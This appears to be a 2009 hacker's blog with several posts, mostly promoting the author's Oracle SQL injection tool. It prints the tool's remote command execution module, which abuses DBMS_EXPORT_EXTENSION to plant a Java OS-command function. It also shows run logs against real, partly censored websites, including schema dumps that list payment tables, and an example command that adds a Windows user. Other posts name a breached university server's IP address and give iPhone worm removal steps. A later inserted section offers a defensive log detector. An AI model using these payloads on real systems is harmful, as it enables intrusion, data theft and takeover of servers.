Friday, December 4, 2009

Indonesian Attacker Hacked into Open University Malaysia (OUM) Remote Desktop Server

[FULL-DISCLOSURE]

found this from the underground scene.. the attacker known as "tey" from indonesia already breached Open University Malaysia Remote Desktop Server with ip address 202.76.239.24
tey also disclosed some proof of concept as below..



Open University Malaysia official site
http://www.oum.edu.my/


p/s: bokep in indonesia means pornographic material if i'm not mistaken.. and wtf!?
p/s/s: wake up! admin.

Wednesday, December 2, 2009

32 Million Social Network Accounts Exposed: 3rd Party App Prone to SQL Injection

the message is clear..
don't trust your favorite 3rd party facebook, myspace applications..
32 million++ credentials like username, email and password (in plaintext yaw!) leaked out in the underground scene..
the responsible provider seems not to walk the talk..
the TOS & Privacy Policy said they do not store users' passwords, yet the passwords were indeed stored, in an insecure way, left unencrypted..
luckily, for me, myspaceism is the past, facebook is not my type ;-p

d3ck4 sayz:
1.) AVOID SOCIAL NETWORKING SITE
2.) USE DIFFERENT USERNAME,EMAIL,PASSWORD FOR EVERY INTERNET ACCOUNT
3.) AVOID SOCIAL NETWORKING SITE ;-)

KID ROCK says:
"twitter is gay!"
http://www.huffingtonpost.com/2009/07/29/kid-rock-twitter-is-gay_n_246818.html

Wednesday, November 11, 2009

Pwning Oracle OS Server with darkORASQLi - Remote Command Execution

Guys! im adding TWO new module/features to darkORASQLi
check this out..
print "    --pwn              Injecting OS command execution function"
print "    --cmd              Command to exec"

SOURCE CODE:
# Mode --pwn
if mode != "" and mode == "--pwn":
print "[+] This mode is taking advantage of DBMS_EXPORT_EXTENSION vulnerability to run OS command\n[+] Sending our ^EVIL^ pay
loads:\n"

payload1_URL = site.replace("utl_inaddr.get_host_address((darkc0de))","(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',
'DBMS_OUTPUT\".PUT(:P1);EXECUTE+IMMEDIATE+''DECLARE+PRAGMA+AUTONOMOUS_TRANSACTION;BEGIN+EXECUTE+IMMEDIATE+''''create+or+replace+and+compil
e+java+source+named+\"LinxUtil\"+as+import+java.io.*;+public+class+LinxUtil+extends+Object+{public+static+String+runCMD(String+args)+{try{Buffered
Reader+myReader=+new+BufferedReader(new+InputStreamReader(+Runtime.getRuntime().exec(args).getInputStream()+)+);+String+stemp,str=\"\";while+(
(stemp+=+myReader.readLine())+!=+null)+str+%2b=stemp%2b\"\\n\";myReader.close();return+str;}+catch+(Exception+e){return+e.toString();}
}public+static+String+readFile(String+filename){try{BufferedReader+myReader=+new+BufferedReader(new+FileReader(filename));+String+stemp,str=\"\"{
; }while+((stemp+=+myReader.readLine())+!=+null)+str+%2b=stemp%2b\"\\n\";myReader.close();return+str;}+catch+(Exception+e){return+e.toStri
ng();}}}'''';END;'';END;--','SYS',0,'1',0)+from+dual)")+arg_end

sys.stdout.write("[+] Stage 1: Creating Java Library ")
source1 = GetThatShit(payload1_URL)
match1 = re.findall("ORA-",source1)
if len(match1) >= 1:
sys.stdout.write("[ FAIL ]\n")
else:
sys.stdout.write("[ OK ]\n")

time.sleep(5)

payload2_URL = site.replace("utl_inaddr.get_host_address((darkc0de))","(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',
'DBMS_OUTPUT\".PUT(:P1);EXECUTE+IMMEDIATE+''DECLARE+PRAGMA+AUTONOMOUS_TRANSACTION;BEGIN+EXECUTE+IMMEDIATE+''''begin+dbms_java.grant_permis
sion(+''''''''PUBLIC'''''''',+''''''''SYS:java.io.FilePermission'''''''',+''''''''<>'''''''',+''''''''execute''''''''+);end;'''';END{
; }'';END;--','SYS',0,'1',0)+from+dual)")+arg_end

sys.stdout.write("[+] Stage 2: Granting Java Execute Privileges ")
source2 = GetThatShit(payload2_URL)
match2 = re.findall("ORA-",source2)
if len(match2) >= 1:
sys.stdout.write("[ FAIL ]\n")
else:
sys.stdout.write("[ OK ]\n")

time.sleep(5)

payload3_URL = site.replace("utl_inaddr.get_host_address((darkc0de))","(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',
'DBMS_OUTPUT\".PUT(:P1);EXECUTE+IMMEDIATE+''DECLARE+PRAGMA+AUTONOMOUS_TRANSACTION;BEGIN+EXECUTE+IMMEDIATE+''''create+or+replace+function+L
inxRunCMD(p_cmd+in+varchar2)+return+varchar2+as+language+java+name+''''''''LinxUtil.runCMD(java.lang.String)+return+String'''''''';+'''';END{
; }'';END;--','SYS',0,'1',0)+from+dual)")+arg_end

sys.stdout.write("[+] Stage 3: Creating Function for Command Execution ")
source3 = GetThatShit(payload3_URL)
match3 = re.findall("ORA-",source3)
if len(match3) >= 1:
sys.stdout.write("[ FAIL ]\n")
else:
sys.stdout.write("[ OK ]\n")

time.sleep(5)

payload4_URL = site.replace("utl_inaddr.get_host_address((darkc0de))","(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',
'DBMS_OUTPUT\".PUT(:P1);EXECUTE+IMMEDIATE+''DECLARE+PRAGMA+AUTONOMOUS_TRANSACTION;BEGIN+EXECUTE+IMMEDIATE+''''grant+all+on+LinxRunCMD+to+p
ublic'''';END;'';END;--','SYS',0,'1',0)+from+dual)")+arg_end

sys.stdout.write("[+] Stage 3: Making Function Executable by All Users ")
source4 = GetThatShit(payload4_URL)
match4 = re.findall("ORA-",source4)
if len(match4) >= 1:
sys.stdout.write("[ FAIL ]\n")
else:
sys.stdout.write("[ OK ]\n")

time.sleep(5)

print "\n[+] If all OK you should now can exec command with --cmd option"
print "[+] Example: \n"
print "[+] Windows"
print "[+] --cmd \"cmd.exe /c net user d3ck4 d4rkc0d3rz /add\"\n"
print "[+] UNIX/Linux"
print "[+] --cmd \"/bin/uname -a\"\n"
sys.exit(1)

# Mode --cmd
elif mode == "--cmd":
print "\n[+] Executing OS command from the server"
count_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||COUNT(sys.LinxRunCMD(\'"+arg_cmd.replace(" ","+")+"\'))||CHR(35)||CHR(58)+FROM+
DUAL")+arg_end
line_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||sys.LinxRunCMD(\'"+arg_cmd.replace(" ","+")+"\')||CHR(35)||CHR(58)+FROM+DUAL")+a
rg_end
arg_row = "Command Lines"

MODULE IN ACTION


--pwn
angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[somevulnsite]/detail.jsp?id=[censored]35'" --pwn

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[somevulnsite]/detail.jsp?id=100[censored]5'
[+] 10:47:52
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored].WORLD
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] This mode is taking advantage of DBMS_EXPORT_EXTENSION vulnerability to run OS command
[+] Sending our ^EVIL^ payloads:

[+] Stage 1: Creating Java Library [ OK ]
[+] Stage 2: Granting Java Execute Privileges [ OK ]
[+] Stage 3: Creating Function for Command Execution [ OK ]
[+] Stage 3: Making Function Executable by All Users [ OK ]

[+] If all OK you should now can exec command with --cmd option
[+] Example:

[+] Windows
[+] --cmd "cmd.exe /c net user d3ck4 d4rkc0d3rz /add"

[+] UNIX/Linux
[+] --cmd "/bin/uname -a"

--cmd "/bin/uname -a"
angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=10[censored]35'" --cmd "/bin/uname -a"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=10[censored]35'
[+] 10:46:54
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi


[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /bin/uname -a
Linux a[censored]n 2.6.9-22.ELsmp #1 SMP Mon Sep 19 18:00:54 EDT 2005 x86_64 x86_64 x86_64 GNU/Linux


[-] 10:46:55
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log

--cmd "/sbin/ifconfig"
angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1[censored]5'" --cmd "/sbin/ifconfig"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=1[censored]5'
[+] 10:33:57
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi


[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:11:[censored]:DC
inet addr:10.[censored] Bcast:10.[censored] Mask:255.255.255.0
inet6 addr: 2001:e68:2000:6458:211:25ff:fec4:dddc/64 Scope:Global
inet6 addr: fe80::211:25ff:fec4:dddc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:351166911 errors:0 dropped:0 overruns:0 frame:0
TX packets:393842969 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:63516816827 (59.1 GiB) TX bytes:231324821682 (215.4 GiB)
Interrupt:201

eth1 Link encap:Ethernet HWaddr 00:11:[censored]:DD
inet6 addr: fe80::211:25ff:fec4:dddd/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:209

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:948943 errors:0 dropped:0 overruns:0 frame:0
TX packets:948943 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:93467115 (89.1 MiB) TX bytes:93467115 (89.1 MiB)



[-] 10:34:04
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log

20% to go.. till then, HAPPY HACKING ;-)
- d3ck4 -
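Seen from the defending side, the requests in this post leave recognisable strings in the web server's access log. The following is an added example, not part of darkORASQLi or of the original post: it URL-decodes each logged request, turns `CHR(n)||CHR(m)` chains back into the literal they build, and flags the function names used by the payloads above. The combined log format, the `INDICATORS` names and the sample lines are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# Strings that appear in the post's payloads and queries, with the phase
# they indicate: 1 = error-based data extraction, 2 = preparing OS access
# through DBMS_EXPORT_EXTENSION, 3 = the installed command function.
INDICATORS = {
    "error_based_extraction": (1, r"utl_inaddr\s*\.\s*get_host_address"),
    "export_extension_call": (2, r"dbms_export_extension\s*\.\s*get_domain_index_tables"),
    "java_source_creation": (2, r"create\s+or\s+replace\s+and\s+compile\s+java\s+source"),
    "java_permission_grant": (2, r"dbms_java\s*\.\s*grant_permission"),
    # Function name used by this tool; an attacker can rename it, so treat
    # it as a tool fingerprint rather than a complete signature.
    "os_command_function": (3, r"\bLinxRunCMD\b"),
}
COMPILED = {name: (rank, re.compile(rx, re.I)) for name, (rank, rx) in INDICATORS.items()}

# CHR(35)||CHR(35) style chains hide string literals from quote filters.
CHR_CHAIN = re.compile(r"CHR\(\s*\d{1,3}\s*\)(?:\s*\|\|\s*CHR\(\s*\d{1,3}\s*\))*", re.I)
# Apache/NGINX "combined" access-log prefix: client, timestamp, request line.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def decode_chr_chains(sql):
    """Replace each CHR(n)||CHR(m)... chain with the quoted literal it builds."""
    def literal(match):
        codes = re.findall(r"\d+", match.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHR_CHAIN.sub(literal, sql)


def url_decode(target):
    """Decode '+' and %xx once, then peel up to two more %xx layers."""
    text = unquote_plus(target)
    for _ in range(2):
        again = unquote(text)
        if again == text:
            break
        text = again
    return text


def classify(target):
    """Return (decoded text, {indicator: phase}) for one request target."""
    raw = url_decode(target)
    text = re.sub(r"\s+", " ", decode_chr_chains(raw))
    hits = {n: rank for n, (rank, rx) in COMPILED.items() if rx.search(text)}
    if CHR_CHAIN.search(raw):
        hits["chr_encoded_literal"] = 1
    return text, hits


def scan(lines):
    """Return one finding per access-log line that carries any indicator."""
    findings = []
    for number, line in enumerate(lines, 1):
        m = LOG_LINE.match(line)
        if not m:
            continue
        text, hits = classify(m.group(2))
        if hits:
            findings.append({"line": number, "client": m.group(1),
                             "indicators": sorted(hits),
                             "phase": max(hits.values()), "decoded": text})
    return findings


# Constructed sample log. Payloads are abbreviated with [...] and the
# addresses come from documentation ranges; none of this is real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Nov/2009:10:40:01 +0800] "GET /detail.jsp?id=1035 HTTP/1.1" 200 4312',
    '192.0.2.10 - - [11/Nov/2009:10:47:53 +0800] "GET /detail.jsp?id=1035[...]'
    '(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(%27FOO%27,%27BAR%27,[...]'
    'dbms_java.grant_permission[...])+from+dual)-- HTTP/1.1" 200 2210',
    '192.0.2.10 - - [11/Nov/2009:10:52:10 +0800] "GET /detail.jsp?id=1035[...]'
    'utl_inaddr.get_host_address((SELECT+CHR(35)||CHR(35)||sys.LinxRunCMD('
    '%27/bin/uname+-a%27)||CHR(35)||CHR(58)+FROM+DUAL))-- HTTP/1.1" 200 1987',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("line %(line)d client %(client)s phase %(phase)d %(indicators)s" % f)
        print("    " + f["decoded"])
```

Only request lines are covered, so injections sent in a POST body or a cookie need the same check at a proxy or application layer. Matching is a detection aid; the underlying fix is bind variables in the JSP and a patched database.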

Tuesday, November 10, 2009

Howto: Prevent & Remove The World First iPhone Worm "ikee virus" with Rick Astley as Wallpaper

Say ? read all these first mate..

World's first iPhone worm Rickrolls angry fanbois
Hey, jailbreakers: ikee never gonna give you up

http://www.theregister.co.uk/2009/11/08/iphone_worm_rickrolls_users/

The attacks, which researchers say are the world's first iPhone worm in the wild, target jailbroken iPhones that have SSH software installed and keep Apple's default root password of "alpine." In addition to showing a well-coiffed picture of Astley, the new wallpaper displays the message "ikee is never going to give you up," a play on Astley's saccharine addled 1987 hit "Never Gonna Give You Up."

3gs wallpaper changed by an app! Help! (iPhone Rickrolling)
http://forums.whirlpool.net.au/forum-replies.cfm?t=1315624

the topic starter say:

So i woke up this morning to find that the wallpaper on my Jailbroken 3GS had been changed to a picture of Rick Astley (some 80's singer?) with the words "ikee is never going to give you up" (the lyrics or title from a song of his)

I have winterboard, and previously had a photo of my partner as the wallpaper. I have tried the following to no avail:

1. Changing the wallpaper back through settings
2. Unticking the "User Wallpaper" option in winterboard – NOTE: this DID remove the picture from the background of my main menu but Rick still appears on my unlock screen.
3. Re-ticking the "User Wallpaper" option in winterboard and changing the wallpaper in settings – rick still appears.

A search of google has turned up nothing, same with the forums.

My guess is one of the apps I've installed has done this and changed something unconfigure-able through the normal settings. Any help is much appreciated. I hate 80s music.

This is my setup:
3GS 16gb
Os 3.1.2 (7D11) on OPTUS
Jailbroken with Blackra1n
Running Cydia, Winterboard and Installous

Interview with ikee (iPhone Virus Creator) - ikee virus removal details enclosed
http://blog.jeltel.com.au/2009/11/interview-with-ikee-iphone-virus.html

ikee say:
[09:05] Secondly i was quite amazed by the number of people who didn't RTFM and change their default passwords.

Hacking Expose say:

To Prevent:
---------------

1. CHANGE DEFAULT ROOT PASSWORD WHICH IS "alpine" AFTER JAILBREAKING YOUR IPHONE

To Remove:
---------------

1. OPEN SSH SESSION OR MOBILE-TERMINAL
2. USE COMMAND "rm -rf" TO DELETE, "man rm" FOR MORE INFO
3. DELETE THESE FILES AND DIRECTORIES IF ANY AVAILABLE
(for variant A,B,C)
/bin/poc-bbot
/bin/sshpass
/var/log/youcanbeclosertogod.jpg
/var/mobile/LockBackground.jpg (or /var/mobile/Library/LockBackground.jpg)
/System/Library/LaunchDaemons/com.ikey.bbot.plist
/var/lock/bbot.lock
(for variant D, it will overwrite Cydia's file, so reinstall Cydia after removal)
/usr/libexec/cydia/startup
/usr/libexec/cydia/startup.so
/usr/libexec/cydia/startup-helper
/System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist
4. REINSTALL SSH DAEMON

Monday, November 9, 2009

60% Working of darkORASQLi.py - Multi Purpose Oracle SQL Injection Tool

as posted at http://forum.darkc0de.com/index.php?action=vthread&forum=8&topic=11271

hai guys.. during free time, im continuing this project and here some snapshot

#!/usr/bin/python
# 07/11/09 d3ck4, hacking.expose@gmail.com
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Multi-Purpose Oracle SQL Injection Tool
# FUNCTIONS
# *error base using utl_inaddr.get_host_address() function method (default method n happy with it!)
# *refer: http://www.red-database-security.com/whitepaper/oracle_sql_injection_web.html
# *full/current/owner base schema enumeration
# *table and column dump
# *database list extractor
# *owners enumeration
# *general info gathering

# UPCOMING (contribution is most welcome!)
# *auto encode to CHR() to bypass quote escaping in where clause statement
# *blind injection support
# *load file and copy to
# *shell exec
# *--update / --drop / --create / etc..

# FEATURES
# *Round Robin Proxy w/ a proxy list (non-auth or auth proxies)
# *Proxy Auth (works great with Squid w/ basic auth)
# *Random browser agent chosen everytime the script runs
# *debug mode for seeing every URL request, proxy used, browser agent used

# darkc0de Crew
# www.darkc0de.com
# d3ck4, hacking.expose[at]gmail[dot]com

# big credit goes to rsauron, rsauron@gmail.com.
# for the beautiful c0de of darkMySQLi & darkMSSQLi
# d3hydr8 and all the darkc0de cr3w

# Share the c0de!

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --info

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:16:34
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production


[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[-] 22:16:37
[-] Total URL Requests: 3
[-] Done

Don't forget to check darkORASQLi.log

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --dbs

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:16:49
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[1] CBCPR2.[somevulnsite].ORG

[-] 22:16:54
[-] Total URL Requests: 4
[-] Done

Don't forget to check darkORASQLi.log

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --owner

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 5/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:17:00
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing all owners in current database
[+] Number of Owners: 15

[1] RTM
[2] LINXSQL
[3] REBEYOND
[4] DBSNMP
[5] OUTLN
[6] PAY_APP
[7] WATERBIRD
[8] IBA_REPORT
[9] WATCHLIST
[10] IBA_APP
[11] PAYMENT
[12] CBC_APP
[13] APP
[14] SYSTEM
[15] SYS

[-] [22:17:19]
[-] Total URL Requests: 18
[-] Done

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --schema

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:17:33
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing Tables & Columns from current user
[+] Number of Tables: 68

[1] WL_ALERTS: ALERT_ID,ALERT
[2] WL_CATS: CAT_ID,CAT_TITLE,CAT_ORDER
[3] WL_GEO_RANGES: RANGE_ID,RANGE
[4] WL_SPECIES: SPECIES_CODE,COM_NAME,SCI_NAME,COM_NAME_UC,SCI_NAME_UC,TAXON_CODE,COUNTABLE,BOLD,IN_USE,DISPLAY_GROUP,SP,COM_NAME_ALT,ACTIVE,SCI_NAME_ALT,SORT_AOU,SORT_ABA,SORT_SIBLEY,SORT_THAYER,SORT_CBC,SORT_CBC_ALT1,SORT_CBC_ALT2,COM_NAME_FR,SPECIES_ID
[5] WL_WATCHLIST: WL_ID,ALERT_ID,SPECIES_ID,CAT_ID,RANGE_ID,SPECIES_CODE,POPULATION,IMAGE,PHOTOG_NAME,SUMMARY,IDENT,DIST,MAP,ECOLOGY,THREATS,CONSERV,TODO,REFS,INCOMPLETE
[6] WL_WATCHLIST_BK0920: TODO,POPULATION,REFS,SUMMARY,RANGE_ID,SPECIES_CODE,MAP,ALERT_ID,SPECIES_ID,THREATS,CONSERV,PHOTOG_NAME,WL_ID,CAT_ID,IMAGE,INCOMPLETE,ECOLOGY,DIST,IDENT

[-] 22:18:52
[-] Total URL Requests: 72
[-] Done

Don't forget to check darkORASQLi.log

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --schema -S all

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:21:30
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing Tables & Columns from all users schema
[+] Number of Tables: 26520

[Owner]: SYS
[Table: Columns]

[1] TAB$: BOBJ,CLUCOLS,CHNCNT,PROPERTY,SPARE3
[2] CLU$: PCTFREE$,MAXTRANS,FUNC
[3] UET$: FILE
[4] SEG$: FILE,EXTSIZE,GROUPS
[5] UNDO$: UGRP,KEEP
[6] TS$: TS,PLUGGED,AFFSTRENGTH
[7] OBJ$: DATAOBJ
[8] IND$: DISTKEY,LBLKKEY,ANALYZETIME,ROWCNT
[9] ICOL$: OBJ,OFFSET,SPARE1
[10] COL$: FIXEDSTORAGE,PROPERTY
[11] USER$: USER,PASSWORD,PTIME,EXPTIME,RESOURCE$,DEFSCHCLASS
[12] PROXY_ROLE_DATA$: ROLE
[13] CON$: OWNER
[14] CDEF$: OBJ,RCON

[Owner]: CBC_APP
[Table: Columns]

[15] CBC_AUX_LOC: LOC_ID,N_LATITUDE_PUB,IRREGULAR
[16] CBC_AUX_RARE_BIRD: OBS_ID


angryleopard:darkc0de d3ck4$ python pg_encode.py PAY_APP
CHR(80)||CHR(65)||CHR(89)||CHR(95)||CHR(65)||CHR(80)||CHR(80)||CHR(10)

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --schema -S "CHR(65)||CHR(80)||CHR(80)"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:42:23
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing Tables & Columns from user "CHR(65)||CHR(80)||CHR(80)" schema
[+] Number of Tables: 122

[Owner]: APP
[Table: Columns]

[1] PAYMENTS: DONATION,METHOD,AMOUNT,PROJ_ID,PAYMENT_DATE,PAYMENT_ID,USER_ID,COUNT_YR,AUTH_CODE,LOC_ID,NUM_UNITS,PAY_ID
[2] PAYMENTS_GHBAK: DONATION,METHOD,AMOUNT,PROJ_ID,PAYMENT_DATE,PAYMENT_ID,USER_ID,COUNT_YR,AUTH_CODE,LOC_ID,NUM_UNITS
[3] PLAN_TABLE: STATEMENT_ID,TIMESTAMP,REMARKS,OPERATION,OPTIONS,OBJECT_NODE,OBJECT_OWNER,OBJECT_NAME,OBJECT_INSTANCE,OBJECT_TYPE,OPTIMIZER,SEARCH_COLUMNS,ID,PARENT_ID,POSITION,COST,CARDINALITY,BYTES,OTHER_TAG,PARTITION_START,PARTITION_STOP,PARTITION_ID,DISTRIBUTION
[4] PROJECTS: PROJ_ID,URL,DESCRIPTION,P_NAME,OPEN
[5] ROLES: ROLE_DESC,ROLE,ROLE_ID,PROJECT_ID
